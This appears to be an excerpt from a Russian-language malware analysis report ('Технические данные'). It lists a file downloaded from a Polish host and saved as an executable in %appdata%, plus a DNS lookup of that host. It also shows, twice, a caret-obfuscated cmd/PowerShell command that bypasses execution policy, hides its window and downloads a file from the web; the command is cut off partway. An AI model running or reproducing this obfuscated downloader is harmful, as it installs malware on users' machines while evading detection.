Техническая информация
- http://lt##.ottenst.pl/file/hen.bhj как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWe^r^S^HElL.eX^e^ -eXe^C^utI^O^npO^LI^Cy^ By^P^as^S ^-^NoPrOFI^lE^ ^-wIn^do^WStYlE h^I^d^De^n^ ^(NE^w^-^O^Bj^Ect S^y^STEm.N^Et^.^w^e^b^C^l^iE^nt).d^ownL^o^ADf^IlE('http:/...
- DNS ASK lt##.ottenst.pl
- '<SYSTEM32>\cmd.exe' /C "POWe^r^S^HElL.eX^e^ -eXe^C^utI^O^npO^LI^Cy^ By^P^as^S ^-^NoPrOFI^lE^ ^-wIn^do^WStYlE h^I^d^De^n^ ^(NE^w^-^O^Bj^Ect S^y^STEm.N^Et^.^w^e^b^C^l^iE^nt).d^ownL^o^ADf^IlE('http:/...' (со скрытым окном)